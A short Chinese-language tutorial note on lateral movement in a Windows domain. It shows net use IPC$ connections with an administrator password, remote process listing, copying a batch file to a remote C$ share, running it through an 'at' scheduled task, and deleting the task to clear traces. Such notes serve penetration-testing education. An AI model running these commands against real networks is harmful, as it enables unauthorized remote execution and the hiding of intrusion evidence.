域内横向移动分析

• 常用windows远程连接和相关命令

1. IPC

　　IPC连接使用方法：

net use \\192.168.xxx.xxx\ipc$ "Aa123456@" /user:administrator
net use           '''查看当前连接'''

　　ipc$利用条件：

• 开启139、445端口
• 管理员开启了默认共享

　　2.获取远程主机信息

dir #列出文件
tasklist /S /U /P #列出进程
#@命令创建定时任务

net time \\192.168.XXX.XXX
copy calc.bat \\192.168.XXX.XXX\C$
at  \\192.168.XXX.XXX 4:11PM C:\calc.bat
#清除记录(数字为进程号)
at \\192.168.XXX.XXX 7 /delete

windows vista 和Server2008之后废除@命令，采用schtasks